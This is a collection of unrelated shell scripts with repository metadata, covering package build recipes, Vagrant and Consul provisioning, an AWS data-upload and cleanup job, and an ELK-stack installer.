echo "$(tput setaf 1)ERROR:$(tput sgr0)U need root l0l"
exit 1
fi
echo "Finishing up, making things pretty"
sleep 5
echo "Thanks for using my script, Kali and Bleeding Edge repos have been installed! You may use $(tput setaf 3) sudo apt-get install -t kali-bleeding-edge [packagename] $(tput sgr0)to install from Bleeding-Edge."
| true |
b13367ab0aae847afeadc1fd64b9056f942e65ca | Shell | ilventu/aur-mirror | /elixir-git/PKGBUILD | UTF-8 | 1,094 | 2.921875 | 3 | [] | no_license | # Maintainer: Curtis McEnroe <programble@gmail.com>
pkgname=elixir-git
pkgver=20120324
pkgrel=1
pkgdesc="A modern approach to programming for the Erlang VM"
arch=('x86' 'x86_64')
url="http://elixir-lang.org/"
license=('Apache')
depends=('erlang>=R15B')
makedepends=('git' 'erlang>=R15B')
provides=('elixir')
conflicts=('elixir')
options=(!makeflags)
_gitroot="git://github.com/elixir-lang/elixir.git"
_gitname="elixir-src"
build() {
cd "$srcdir"
msg "Connecting to GIT server...."
if [[ -d "$_gitname" ]]; then
cd "$_gitname" && git pull origin
msg "The local files are updated."
else
git clone "$_gitroot" "$_gitname"
fi
msg "GIT checkout done or server timeout"
msg "Starting build..."
rm -rf "$srcdir/$_gitname-build"
git clone "$srcdir/$_gitname" "$srcdir/$_gitname-build"
cd "$srcdir/$_gitname-build"
make
}
package() {
cd "$srcdir/$_gitname-build"
mkdir -p "${pkgdir}/usr/lib/elixir"
cp -R bin/ ebin/ exbin/ "${pkgdir}/usr/lib/elixir"
mkdir -p "${pkgdir}/usr/bin"
ln -s ../lib/elixir/bin/{elixir,elixirc,iex} "${pkgdir}/usr/bin"
}
# vim:set ts=2 sw=2 et:
| true |
2c86f183b2b1c7aa558a0dc8245fa6e9a1662469 | Shell | atweiden/voidpkgs | /srcpkgs/libsodium/template | UTF-8 | 742 | 2.53125 | 3 | [
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain"
] | permissive | maintainer="nox"
pkgname="libsodium"
version=1.0.18
revision=1
short_desc="Modern and easy-to-use crypto library"
homepage="https://libsodium.org/"
license="ISC"
distfiles="https://download.libsodium.org/libsodium/releases/$pkgname-$version.tar.gz"
checksum="6f504490b342a4f8a4c4a02fc9b866cbef8622d5df4e5452b46be121e46636c1"
build_style="gnu-configure"
configure_args="lt_cv_prog_compiler_static_works=yes"
post_install() {
vlicense LICENSE
}
libsodium-devel_package() {
short_desc+=" - development files"
depends="$sourcepkg>=${version}_$revision"
pkg_install() {
vmove usr/include
vmove "usr/lib/*.a"
vmove "usr/lib/*.so"
vmove usr/lib/pkgconfig
}
}
# vim: set filetype=sh foldmethod=marker foldlevel=0 nowrap:
| true |
846ff78c62c1e2331594782291ace0ef53423d82 | Shell | hengsin/hengsin | /com.github.hengsin.sysconfig.init/build.sh | UTF-8 | 949 | 3.359375 | 3 | [] | no_license | #!/bin/bash
script_dir=$(realpath $(dirname "$0"))
if [ -z "$IDEMPIERE_SOURCE" ]; then
if [[ -f "$script_dir/idempiere_source.properties" ]]; then
source "$script_dir/idempiere_source.properties"
fi
fi
if [ -z "$IDEMPIERE_SOURCE" ]; then
if [[ -f "$script_dir/../idempiere_source.properties" ]]; then
source "$script_dir/../idempiere_source.properties"
fi
fi
if [ -z "$IDEMPIERE_SOURCE" ]; then
if [ -d "$script_dir/../idempiere/org.idempiere.p2.targetplatform" ]; then
IDEMPIERE_SOURCE=$(realpath "$script_dir/../idempiere")
fi
if [ -z "$IDEMPIERE_SOURCE" ]; then
if [ -d "$script_dir/../../idempiere/org.idempiere.p2.targetplatform" ]; then
IDEMPIERE_SOURCE=$(realpath "$script_dir/../../idempiere")
fi
fi
fi
if [ -z "$IDEMPIERE_SOURCE" ]; then
echo "IDEMPIERE_SOURCE environment variable not set"
exit 1
fi
echo $IDEMPIERE_SOURCE
export IDEMPIERE_SOURCE
mvn verify
| true |
10cd692ea47db0e2cd4d10c6f0b2b90782ebc6db | Shell | nautsio/workshop-swarm | /scripts/provision.sh | UTF-8 | 862 | 3.609375 | 4 | [] | no_license | #!/usr/bin/env bash
MACHINE_PREFIX=$1
MACHINE_ID=$2
NUM_INSTANCES=$3
generateNodeHostsLine() {
    # Print "<ip> <hostname>" for node $1: IPs start at 172.16.8.101 and
    # hostnames are "$MACHINE_PREFIX-NN" with a zero-padded node number.
    local node_ip node_host
    node_ip="172.16.8.$(( 100 + $1 ))"
    printf -v node_host "$MACHINE_PREFIX-%02d" "$1"
    echo "$node_ip $node_host"
}
# Write /etc/consul.d/node.json for this node.  Node 1 bootstraps the
# cluster; every other node joins via node 1's fixed address.
writeConsulNodeConfig() {
    # Bind/client address follows the same 172.16.8.1xx scheme as the hosts file.
    local BINDADDR="172.16.8.$((100+$MACHINE_ID))"
    if [ $MACHINE_ID == 1 ]; then
        printf '{"bootstrap": true, "bind_addr": "%s", "client_addr": "%s"}' $BINDADDR $BINDADDR | jq . > /etc/consul.d/node.json
    else
        printf '{"start_join": ["172.16.8.101"], "bind_addr": "%s", "client_addr": "%s"}' $BINDADDR $BINDADDR | jq . > /etc/consul.d/node.json
    fi
}
# Rewrite /etc/hosts with localhost plus one line per cluster node
# (generated by generateNodeHostsLine for nodes 1..NUM_INSTANCES).
function writeHostsFile() {
    local LOCALHOST="127.0.0.1 localhost"
    # '>' truncates: the file is rebuilt from scratch each run.
    echo $LOCALHOST > /etc/hosts
    for ((i=1; i<=$NUM_INSTANCES; i++))
    do
        echo $(generateNodeHostsLine $i) >> /etc/hosts
    done
}
writeHostsFile
writeConsulNodeConfig
sudo service consul restart
| true |
2c5b78d3846d5f62077f3330050bd1cfa3f143f7 | Shell | jbustamante35/phytomorph | /Extraction/Pipelines/oneRing/Octerine/globalHelpers/fastOrderintoSets.sh | UTF-8 | 135 | 2.890625 | 3 | [] | permissive | #!/bin/bash
fileName=$(basename "$1")
baseName=${1/"$fileName"}
echo "$fileName" >> $2
#echo "$fileName" >> $3
#echo "$baseName" >> $2
| true |
35ded2c4c8bb43bef3f573ba1e0ce27b98545a3e | Shell | hongdago/Ushell | /record_file/parse_variable_length_records.sh | UTF-8 | 591 | 3.40625 | 3 | [] | no_license | #!/bin/sh
#处理变长记录文件
function parse_variable_length_records
{
>$OUTFILE
exec 1<&4
exec 1>$OUTFILE
while read RECORD
do
echo $RECORD | awk -F : '{print $1 $2 $3 $$ $5}' \
|while read BRANCH ACCOUNT NAME TOTAL DATEDUE
do
#process_data $BRANCH $ACCOUNT $NAME $TOTAL $DATEDUE
echo $BRANCH $ACCOUNT $NAME $TOTAL $DATEDUE
if (( $? !=0))
then
echo "Record Error : $RECORD" | tee -a $LOGFILE
fi
done
done<$INFILE
exec 1<&4
exec 4>&-
}
| true |
5b4b714d43d469c77579cf35fbbada251cc02bd1 | Shell | mert-ayhan/linux-benchmark | /benchmark.sh | UTF-8 | 706 | 3.984375 | 4 | [] | no_license | #! /bin/bash
if ! [ -x "$(command -v mpstat)" ]; then
echo 'error: sysstat is not installed.' >&2
exit 1
fi
if [ $# -ne 2 ]; then
echo "usage: ./benchmark.sh [file_name] [seconds]"
else
printf "Bencmark Started!\nData will be logged to ${1} every ${2} seconds.\n"
echo
echo "Date,Memory,Disk,CPU" >> $1
echo "Date,Memory,Disk,CPU"
end=$((SECONDS+3600))
while [ $SECONDS -lt $end ]; do
CURRENTDATE=`date +"%Y-%m-%d %T"`
MEMORY=$(free | awk 'FNR == 2 {print ($3/$2)*100"%"}')
DISK=$(df -h | awk '$NF=="/"{printf "%s,", $5}')
CPU=$(mpstat 1 1 | awk '/^Average/ {print 100-$NF"%"}')
echo $CURRENTDATE$MEMORY$DISK$CPU >> $1
echo $CURRENTDATE$MEMORY$DISK$CPU
sleep $2
done
fi
| true |
986da1485e70a82a0dadb88229e33ad927674fd8 | Shell | jappoker/walker-zsh-theme | /walker.zsh-theme | UTF-8 | 1,683 | 2.546875 | 3 | [] | no_license | # Modiefied from robbyrussell and inspired by jonathon.
# Apr 11, 2018 by Walker
# git
ZSH_THEME_GIT_PROMPT_PREFIX=" on %{$fg[green]%}"
ZSH_THEME_GIT_PROMPT_SUFFIX="%{$reset_color%}"
ZSH_THEME_GIT_PROMPT_DIRTY=""
ZSH_THEME_GIT_PROMPT_CLEAN=""
ZSH_THEME_GIT_PROMPT_ADDED="%{$fg[green]%} ✚"
ZSH_THEME_GIT_PROMPT_MODIFIED="%{$fg[blue]%} ✹"
ZSH_THEME_GIT_PROMPT_DELETED="%{$fg[red]%} ✖"
ZSH_THEME_GIT_PROMPT_RENAMED="%{$fg[magenta]%} ➜"
ZSH_THEME_GIT_PROMPT_UNMERGED="%{$fg[yellow]%} ═"
ZSH_THEME_GIT_PROMPT_UNTRACKED="%{$fg[cyan]%} ✭"
local blue_op="%{$fg[blue]%}[%{$reset_color%}"
local blue_cp="%{$fg[blue]%}]%{$reset_color%}"
local top_tab="%{$fg[blue]%}╭──%{$reset_color%}"
local bottom_tab="%{$fg[blue]%}╰〢%{$reset_color%}"
local barline="%{$fg[blue]%}────%{$reset_color%}"
local hist_no="${blue_op}%{$fg[yellow]%}%h${blue_cp}"
local time_display="${blue_op}%{$fg[yellow]%}%t${blue_cp}"
local day_display="${blue_op}%{$fg[yellow]%}$(date +%a,%b%d)${blue_cp}"
if [ $USER = $DEFAULT_USER ]; then
local user_host="${blue_op}%{$fg_bold[cyan]%}%n$(git_prompt_info)$(git_prompt_status)%{$reset_color%}${blue_cp}"
else
local user_host="${blue_op}%{$fg_bold[cyan]%}%n%{$fg[blue]%}@%{$fg_bold[green]%}%m:%l$(git_prompt_info)$(git_prompt_status)%{$reset_color%}${blue_cp}"
fi
#local user_infoo="${blue_op}$(git_prompt_info)${blue_cp}"
local path_p="${blue_op}%{$fg_bold[cyan]%}%~%{$reset_color%}${blue_cp}"
local begcur="%(?,%{$fg_bold[green]%} ∷ %{$reset_color%},%{$fg_bold[red]%} ☋ %{$reset_color%})"
PROMPT="${top_tab}${time_display}${barline}${user_host}${barline}\
${hist_no}${barline}${day_display}\
${bottom_tab}${path_p}${begcur}"
| true |
069f27b70472f1f4edcee57df8158c6e3781e5b8 | Shell | yuhanfu/Samples | /Web_Service/mysql/backend.sh | UTF-8 | 1,010 | 2.75 | 3 | [] | no_license | # install mysql
sudo apt-get update
sudo apt-get install mysql-server # need specify password
# install python
sudo apt-get install python -y
# install gutil
curl https://sdk.cloud.google.com | bash # multiple yes
## mysql
# create table from mysql
CREATE TABLE twitter_test (
keyword varchar(255) NOT NULL,
uid varchar(255) NOT NULL,
hashtags varchar(1024) NOT NULL,
count BIGINT(8) NOT NULL
);
# doanload file
sudo gsutil cp gs://teamprojectcc/twitter/mapreduce2/* ./
# import data
LOAD DATA LOCAL INFILE 'part-00000' INTO TABLE twitter_test
FIELDS TERMINATED BY '\t'
## shell
mysqlimport --fields-terminated-by='\t' \
--local -u root -p password\
twitter \
twitter_test.tsv
# create index on keyword column
create index keyword_idx on twitter_test (keyword)
# check database size
SELECT table_schema "Data Base Name",
sum( data_length + index_length) / 1024 / 1024 "Data Base Size in MB"
FROM information_schema.TABLES GROUP BY table_schema;
| true |
6cd9e484e5e00f9afc7afacf7c3e39ae861c9782 | Shell | nbproject/nbproject | /vagrant_provision.sh | UTF-8 | 1,684 | 3.34375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
set -ex

# Provision the NB project inside the Vagrant VM.  Each one-time step is
# guarded by a marker file under /milestones so re-provisioning only
# re-runs steps that have not completed yet.
mkdir -p /milestones

if [[ ! -e nbproject ]]; then
    echo "Can't find nbproject directory. Make sure NFS is installed and running (systemctl status nfs-server)\n If NFS isn't available on your system, disable the nfs option for the sync folder in the Vagrantfile."
    exit 1
fi
cd nbproject

MILESTONE=/milestones/prereqs
if [[ ! -e ${MILESTONE} ]]; then
    make prereqs
    touch ${MILESTONE}
fi

# BUG FIX: this step originally reused the marker name "prereqs", so the
# a2enmod/restart step could never run (the previous step had already
# created that marker).
MILESTONE=/milestones/apache_headers
if [[ ! -e ${MILESTONE} ]]; then
    a2enmod headers
    apache2ctl restart
    touch ${MILESTONE}
fi

MILESTONE=/milestones/pip_requirements
if [[ ! -e ${MILESTONE} ]]; then
    pip3 install -r requirements.txt
    touch ${MILESTONE}
fi

MILESTONE=/milestones/npm_install
if [[ ! -e ${MILESTONE} ]]; then
    su vagrant -c 'npm install'
    touch ${MILESTONE}
fi

MILESTONE=/milestones/make_django1
if [[ ! -e ${MILESTONE} ]]; then
    su vagrant -c 'make django'
    touch ${MILESTONE}
fi

MILESTONE=/milestones/settings_customizations
if [[ ! -e ${MILESTONE} ]]; then
    # Interactive pause: waits for the operator to edit settings_credentials.py.
    echo "Make customizations in settings_credentials.py then press ENTER to continue"
    read
    touch ${MILESTONE}
fi

MILESTONE=/milestones/make_confapache
if [[ ! -e ${MILESTONE} ]]; then
    make confapache
    touch ${MILESTONE}
fi

MILESTONE=/milestones/make_createdirs
if [[ ! -e ${MILESTONE} ]]; then
    make create_dirs
    touch ${MILESTONE}
fi

MILESTONE=/milestones/make_installgrunt
if [[ ! -e ${MILESTONE} ]]; then
    su vagrant -c 'make installgrunt'
    touch ${MILESTONE}
fi

MILESTONE=/milestones/make_rungrunt
if [[ ! -e ${MILESTONE} ]]; then
    su vagrant -c 'make rungrunt'
    touch ${MILESTONE}
fi

apache2ctl restart
c06de9fb8932af490e92788c025e3034371dfc96 | Shell | chenliru/cweb.io | /shell/sys_script/aws/aws_kill.sh | UTF-8 | 6,663 | 3.65625 | 4 | [
"MIT"
] | permissive | #!/bin/ksh93
#########################################################################
# SHELL SCRIPTS TOOLS LIBRARY
#----------------------------------------------------------------------
# 1. re-send failed data/key files (today or $1) for network/aws reasons
# 2. clean up expired data files
#
# Author : Liru Chen
# Licensed Materials ; All Rights Reserved 2015-2019
#########################################################################
# Verbose + trace mode: every line is echoed as read and as executed.
set -v
set -x
MAILALERT="lchen@livingstonintl.com"
MAILNOTICE="lchen@livingstonintl.com"
#AWS's Parameter
# AWSDATE: date being processed -- $1 if supplied, otherwise today.
CURDATE=$(date +%Y%m%d)
AWSDATE=${1-$CURDATE}
#kill aws processes if any
awsprocesskill () {
# Kill every process whose ps line mentions "aws".
# BUG FIX: the match also catches this very script (aws_kill.sh) and its
# pipeline children, so the original could SIGKILL itself mid-run; skip
# our own PID.  NOTE(review): the "aws" substring match is still very
# broad (it would also match e.g. an unrelated aws CLI) -- confirm intent.
ps -ef|grep -v grep|grep aws|while read owner pid ppid etc
do
[[ $pid -eq $$ ]] && continue
kill -9 $pid
done
}
#Clean expired file types like *log after @days, under directories listed
awsbkup () {
AWSTMPDIR=/recyclebox/AWS/temp
AWSERRDIR=/recyclebox/AWS/parsererror/${AWSDATE}
[[ ! -d $AWSERRDIR ]] && mkdir -p $AWSERRDIR
CLEARSTAGE="/recyclebox/AWS/clears" #Also including this directory in CLEARDIR
# Each CLEARDIR entry is "<dir>@<comma-separated name patterns|ALL>@<days>".
CLEARDIR="
/dmqjtmp/rcp/stage/AWSOutput@"icc,vax"@5
/dmqjtmp/rcp/stage/iccdatauploadOutput@"DataFile"@5
/dmqjtmp/rcp/stage/ICCBillingUploadOutput@"DataFile"@5
/dmqjtmp/rcp/stage/ICCSetExpiryDatesOutput@"DataFile"@5
/insight/local/scripts/VaxParser/VaxParserLogs@"log"@5
/recyclebox/AWS/uploadfail/done@"ALL"@5
${CLEARSTAGE}@"ALL"@7
"
[[ ! -d $CLEARSTAGE ]] && mkdir -p $CLEARSTAGE
# Archives (and tmplist) are written into the staging directory.
cd $CLEARSTAGE
for directory in $CLEARDIR
do
# Split the entry on '@' into location, type list and retention days.
location=$(echo "${directory}@"|cut -f1 -d@)
types=$(echo "${directory}@"|cut -f2 -d@|tr , " ")
days=$(echo "${directory}@"|cut -f3 -d@)
[[ ! -d $location || $days == "" ]] && {
echo "$location NOT EXIST and/or Clear Day is 0"
continue
}
# Archive name: the directory path with '/' replaced by '.'.
bkupname=$(echo $location|sed "s/\//./g")
for type in $types
do
if [[ $location == $CLEARSTAGE ]]
then
# The staging dir itself is only pruned, never archived.
if [[ $type == ALL ]]
then
find $location -mtime +$days -exec rm -f {} \;
else
find $location -name "*${type}*" -mtime +$days -exec rm -f {} \;
fi
else
#Backup by filename and filetype
# NOTE(review): 'tar -L tmplist' reads the file list on AIX tar; GNU tar
# uses -T and treats -L as tape length -- confirm this only runs on AIX.
if [[ $type == ALL ]]
then
find $location -mtime +$days -print > tmplist
tar -cvf ${bkupname}.${CURDATE}.tar -L tmplist
[[ -e ${bkupname}.${CURDATE}.tar ]] && gzip -f ${bkupname}.${CURDATE}.tar
#then, delete
find $location -mtime +$days -exec rm -f {} \;
else
find $location -name "*${type}*" -mtime +$days -print > tmplist
tar -cvf ${bkupname}.${CURDATE}.tar -L tmplist
[[ -e ${bkupname}.${CURDATE}.tar ]] && gzip -f ${bkupname}.${CURDATE}.tar
#then, delete
find $location -name "*${type}*" -mtime +$days -exec rm -f {} \;
fi
fi
done
done
#backup all logs, sql files, key files if errors during query informix db
cd $AWSTMPDIR
grep -i error $AWSTMPDIR/MISSED*.out
[[ $? -eq 0 ]] && {
mail -s "VAX Errors in SQL MISSED*.out" "$MAILALERT" < /dev/null
[[ ! -d $AWSERRDIR ]] && mkdir -p $AWSERRDIR
cp $AWSTMPDIR/MISSED*.out $AWSERRDIR
cp $AWSTMPDIR/*.sql $AWSERRDIR
# NOTE(review): AWSINDIR is not set in this function (it is defined in
# awscleanup/awsload) -- confirm it is exported before awsbkup runs.
cp $AWSINDIR/keydone/*.txt $AWSERRDIR
}
# Mail and preserve any non-empty per-key error files.
find $AWSTMPDIR -name "*.error" -size +0 -print|
while read errorfile
do
mail -s "VAX Failed key of $errorfile" "$MAILALERT" < $errorfile
[[ ! -d $AWSERRDIR ]] && mkdir -p $AWSERRDIR
cp $errorfile $AWSERRDIR
done
}
#send out failed data/key files if any
awsload () {
# Upload incremental VAX data files and their token files to the AWS
# ingest host over scp, mailing success/failure notices; failed files
# are copied to $AWSFAILDIR for a later retry.
AWSRUNDIR=/insight/local/scripts/VaxParser/tools
AWSPRIVATEKY=$AWSRUNDIR/.ssh/Privatekey
AWSFAILDIR=/recyclebox/AWS/uploadfail
AWSOUTBASE=/dmqjtmp/rcp/stage/AWSOutput
AWSOUTDIR=$AWSOUTBASE/output
AWSREMOTE="ingest@a0alpcdhcan01.lii01.livun.com"
AWSREMOTEDATA="/opt/ingest/informix/data/${AWSDATE}"
AWSREMOTEKEY="/opt/ingest/informix/key/${AWSDATE}"
AWSREMOTEVAX="/opt/ingest/informix/locusvax/${AWSDATE}"
#Setup DIRECTORY on AWS side
ssh -i $AWSPRIVATEKY $AWSREMOTE \
"[[ ! -d $AWSREMOTEDATA ]] && mkdir -p $AWSREMOTEDATA"
#BUG FIX: the original test read '$$AWSREMOTEKEY', which expanded to the
#local PID followed by the literal text "AWSREMOTEKEY", so the existence
#check never referred to the real directory.
ssh -i $AWSPRIVATEKY $AWSREMOTE \
"[[ ! -d $AWSREMOTEKEY ]] && mkdir -p $AWSREMOTEKEY"
ssh -i $AWSPRIVATEKY $AWSREMOTE \
"[[ ! -d $AWSREMOTEVAX ]] && mkdir -p $AWSREMOTEVAX"
#Start transfer data files and data token files from $AWSOUTDIR to AWS
cd $AWSOUTDIR
scp -i $AWSPRIVATEKY $AWSOUTDIR/* $AWSREMOTE:$AWSREMOTEDATA
if [[ $? -ne 0 ]]
then
mail -s "VAX incremental data upload failed" "$MAILALERT" < /dev/null
[[ ! -d $AWSFAILDIR ]] && mkdir -p $AWSFAILDIR
cp $AWSOUTDIR/* $AWSFAILDIR
mail -s "VAX upload failed incremental data copied to $AWSFAILDIR" "$MAILALERT" < /dev/null
else
mail -s "VAX incremental data upload completed" "$MAILNOTICE" < /dev/null
fi
#NOTE(review): $VAXPARSERRUNDIR is never set in this script (only
#AWSRUNDIR is) -- confirm it is exported by the caller, otherwise this
#line runs "/datatoken.sh".
$VAXPARSERRUNDIR/datatoken.sh
scp -i $AWSPRIVATEKY $AWSOUTDIR/*.token $AWSREMOTE:$AWSREMOTEDATA
if [[ $? -ne 0 ]]
then
mail -s "VAX incremental data token upload failed" "$MAILALERT" < /dev/null
[[ ! -d $AWSFAILDIR ]] && mkdir -p $AWSFAILDIR
cp $AWSOUTDIR/*.token $AWSFAILDIR
mail -s "VAX upload failed incremental data token copied to $AWSFAILDIR" "$MAILALERT" < /dev/null
else
mail -s "VAX incremental data token upload completed" "$MAILNOTICE" < /dev/null
fi
}
#clean up all running directories/token file for awslocus.ksh and awscoda.sh
# Removes intermediate files from every working directory and releases
# the run.token lock.  Each directory is guarded with a -d test so a
# missing directory is silently skipped.
awscleanup () {
VAXPARSERINDIR=/dmqjtmp/vaxparser
VAXPARSERPROCESSEDDIR=/dmqjtmp/vaxparserprocessed
AWSTMPDIR=/recyclebox/AWS/temp
AWSOUTBASE=/dmqjtmp/rcp/stage/AWSOutput
AWSOUTDIR=$AWSOUTBASE/output
AWSINDIR=/dmqjtmp/rcp/stage/VaxParserOutput
AWSRUNDIR=/insight/local/scripts/VaxParser/tools
#Clean vax parser running directory
[[ -d $VAXPARSERINDIR ]] && {
rm -f $VAXPARSERINDIR/*.vax
}
#clean vax parser running directory
[[ -d $VAXPARSERPROCESSEDDIR ]] && {
rm -f $VAXPARSERPROCESSEDDIR/*.vax
rm -f $VAXPARSERPROCESSEDDIR/*.vaxtoken
}
#Clean $AWSTMPDIR
[[ -d $AWSTMPDIR ]] && {
rm -f $AWSTMPDIR/*.tmp
rm -f $AWSTMPDIR/*.tmp1
rm -f $AWSTMPDIR/*.tmp2
rm -f $AWSTMPDIR/*.dbaccess
rm -f $AWSTMPDIR/*.vax4sql
rm -f $AWSTMPDIR/*.unload
rm -f $AWSTMPDIR/MISSED*.out
rm -f $AWSTMPDIR/*.sql
rm -f $AWSTMPDIR/*.error
}
#Clean $AWSOUTBASE
[[ -d $AWSOUTBASE ]] && {
rm -f $AWSOUTBASE/*done.*
rm -f $AWSOUTBASE/*current.*
}
#Clean $AWSOUTDIR
# The second pattern matches 14-character timestamp suffixes (?x14).
[[ -d $AWSOUTDIR ]] && {
rm -f $AWSOUTDIR/*.token
rm -f $AWSOUTDIR/*.??????????????
}
#Clean $AWSINDIR/keydone
[[ -d $AWSINDIR ]] && {
rm -f $AWSINDIR/keydone/*.txt
rm -f $AWSINDIR/keydone/*.txt.token
}
#release process token lock
[[ -e $AWSRUNDIR/run.token ]] && rm -f $AWSRUNDIR/run.token
}
#Start main
# Order matters: kill stragglers first, archive/prune, retry uploads,
# then clean up working directories and release the lock.
awsprocesskill
awsbkup
awsload
awscleanup
##VAX Data files, copied by runner*.ksh from /dmqjtmp/rcp/
#VAXDIR=/dmqjtmp/rcp/stage/done
#VAXDIR=/dmqjtmp/rcp/stage/done;[[ -d $VAXDIR ]] && rm -f $VAXDIR/*.vax;
exit 0
| true |
889b5b981d26ed7f34f7bf55820a99011c4e44de | Shell | Azure/Hyperledger-Fabric-on-Azure-Kubernetes-Service | /fabricTools/scripts/generateRootCertificate.sh | UTF-8 | 1,945 | 3.265625 | 3 | [
"Apache-2.0"
] | permissive | orgName=$1
# Positional arguments (after orgName=$1): the org's domain name and the
# timestamp used for log correlation by the fabric tools scripts.
domainName=$2
fabricToolsScriptStartTime=$3
# Shared helpers: toolsNamespace, executeKubectlWithRetry, logMessage, ...
. /var/hyperledger/scripts/globals.sh
. /var/hyperledger/scripts/utils.sh
# Fresh scratch CA directory layout expected by openssl_root.cnf.
rm -rf /tmp/rca
mkdir -p /tmp/rca
touch /tmp/rca/index.txt
mkdir -p /tmp/rca/newcerts
# Generate an EC P-256 key, a CSR for rca.<org>, and self-sign it for 10
# years; -startdate is backdated 10 minutes to tolerate clock skew.
openssl ecparam -name prime256v1 -genkey -noout -out /tmp/rca/rca.key || exit 1
openssl req -config /var/hyperledger/scripts/openssl_root.cnf -new -sha256 -extensions v3_ca -key /tmp/rca/rca.key -out /tmp/rca/rca.csr -days 3650 -subj "/C=US/ST=Washington/L=Redmond/O=${orgName}/OU=${orgName}/CN=rca.${orgName}" || exit 1
openssl ca -create_serial -selfsign -days 3650 -notext -md sha256 -in /tmp/rca/rca.csr -out /tmp/rca/rca.pem -keyfile /tmp/rca/rca.key -startdate `date --date 'now - 10 minutes' +%Y%m%d%H%M%SZ` -config /var/hyperledger/scripts/openssl_root.cnf -extensions v3_ca || exit 1
# Store private certificates in secrets
# NOTE(review): $res is presumably set by executeKubectlWithRetry (utils.sh)
# — verify, since it is tested right after each call.
CA_CERT=$(ls /tmp/rca/rca.key)
executeKubectlWithRetry "kubectl -n ${toolsNamespace} create secret generic hlf-ca-idkey --from-file=rca.key=$CA_CERT" "Storing Fabric-CA Root CA key in kubernetes secret failed" "$fabricToolsScriptStartTime" "no-verifyResult"
if [ $res -ne 0 ]; then
	logMessage "Error" "Storing Fabric-CA Root CA key in kubernetes secret failed" "$fabricToolsScriptStartTime"
	rm -rf /tmp/rca/*
	exit 1
fi
# Store public certificates in secrets
CA_CERT=$(ls /tmp/rca/rca.pem)
executeKubectlWithRetry "kubectl -n ${toolsNamespace} create secret generic hlf-ca-idcert --from-file=rca.pem=$CA_CERT" "Storing Fabric-CA Root CA certificate in kubernetes secret failed" "$fabricToolsScriptStartTime" "no-verifyResult"
if [ $res -ne 0 ]; then
	logMessage "Error" "Storing Fabric-CA Root CA certificate in kubernetes secret failed" "$fabricToolsScriptStartTime"
	rm -rf /tmp/rca/*
	exit 1
fi
# Copy CA Root Public certificate for TLS communication with Fabric-ca,
# then scrub the scratch directory (it held the private key).
mkdir -p /tmp/fabric-ca/tls-certfile
cp /tmp/rca/rca.pem /tmp/fabric-ca/tls-certfile/
rm -rf /tmp/rca/*
exit 0
| true |
4ddf3604e2eeb72e2a30122ed98c32cd026efbb9 | Shell | a-h/vagrant-playground | /elk.sh | UTF-8 | 6,926 | 3.484375 | 3 | [] | no_license | #!/usr/bin/env bash
# See instructions at https://www.digitalocean.com/community/tutorials/how-to-install-elasticsearch-logstash-and-kibana-4-on-centos-7
# Sync time properly. (-y added: without it yum prompts for confirmation
# and blocks this otherwise unattended script.)
sudo yum install -y ntp

##################
# Elastic Search #
##################

# Install Java 8 (Oracle JRE; the cookie header accepts the license).
cd /opt
wget --no-cookies --no-check-certificate --header "Cookie: gpw_e24=http%3A%2F%2Fwww.oracle.com%2F; oraclelicense=accept-securebackup-cookie" \
"http://download.oracle.com/otn-pub/java/jdk/8u40-b25/jre-8u40-linux-x64.tar.gz"
# Extract archive.
tar xvf jre-8*.tar.gz
chown -R root: jre1.8*
# Alias java to use the correct version
sudo alternatives --install /usr/bin/java java /opt/jre1.8*/bin/java 1
# Delete old archive.
rm /opt/jre-8*.tar.gz

# Install Elasticsearch: trust the packaging key, then add the yum repo
# (here-doc replaces the previous echo chain — same file contents).
rpm --import http://packages.elasticsearch.org/GPG-KEY-elasticsearch
cat > /etc/yum.repos.d/elasticsearch.repo <<'EOF'
[elasticsearch-1.6]
name=Elasticsearch repository for 1.6.x packages
baseurl=http://packages.elasticsearch.org/elasticsearch/1.6/centos
gpgcheck=1
gpgkey=http://packages.elasticsearch.org/GPG-KEY-elasticsearch
enabled=1
EOF
# Do it
yum -y install elasticsearch
# Consider modifying /etc/elasticsearch/elasticsearch.yml to remove access outside of localhost.
# Start it up now and on every boot.
systemctl start elasticsearch.service
/bin/systemctl daemon-reload
systemctl enable elasticsearch.service

##########
# Kibana #
##########
cd ~; wget https://download.elastic.co/kibana/kibana/kibana-4.0.3-linux-x64.tar.gz
tar xvf kibana-*.tar.gz
# Consider limiting access to kibana by changing the host at ~/kibana-4*/config/kibana.yml
# Move kibana into a better location
sudo mkdir -p /opt/kibana
sudo cp -R ~/kibana-4*/* /opt/kibana/
# Create start up file.
cat > /etc/systemd/system/kibana4.service <<'EOF'
[Service]
ExecStart=/opt/kibana/bin/kibana
Restart=always
StandardOutput=syslog
StandardError=syslog
SyslogIdentifier=kibana4
User=root
Group=root
Environment=NODE_ENV=production

[Install]
WantedBy=multi-user.target
EOF
# Start it up.
sudo systemctl start kibana4
sudo systemctl enable kibana4
# If access to Kibana is limited, then we should create a nginx proxy to allow access.

############
# Logstash #
############
# The Logstash package shares the same GPG Key as Elasticsearch, and we already installed that public key,
# so let's create and edit a new Yum repository file for Logstash:
cat > /etc/yum.repos.d/logstash.repo <<'EOF'
[logstash-1.5]
name=logstash repository for 1.5.x packages
baseurl=http://packages.elasticsearch.org/logstash/1.5/centos
gpgcheck=1
gpgkey=http://packages.elasticsearch.org/GPG-KEY-elasticsearch
enabled=1
EOF
yum -y install logstash
# Logstash is installed but it is not configured yet.
# using hard coded ip here.
sed -i -e "s/\[ v3_ca \]/[ v3_ca ]\nsubjectAltName = IP: 192.168.80.0/g" /etc/pki/tls/openssl.cnf
# Generate SSL cert.
cd /etc/pki/tls
sudo openssl req -config /etc/pki/tls/openssl.cnf -x509 -days 3650 -batch -nodes -newkey rsa:2048 -keyout private/logstash-forwarder.key -out certs/logstash-forwarder.crt
mkdir /etc/logstash/
mkdir /etc/logstash/conf.d/
mkdir /opt/logstash/patterns
cat > /opt/logstash/patterns/nginx <<end_of_nginx_pattern
NGUSERNAME [a-zA-Z\.\@\-\+_%]+
NGUSER %{NGUSERNAME}
NGINXACCESS %{IPORHOST:clientip} %{NGUSER:ident} %{NGUSER:auth} \[%{HTTPDATE:timestamp}\] "%{WORD:verb} %{URIPATHPARAM:request} HTTP/%{NUMBER:httpversion}" %{NUMBER:response} (?:%{NUMBER:bytes}|-) (?:"(?:%{URI:referrer}|-)"|%{QS:referrer}) %{QS:agent}
end_of_nginx_pattern
sudo chown logstash:logstash /opt/logstash/patterns/nginx
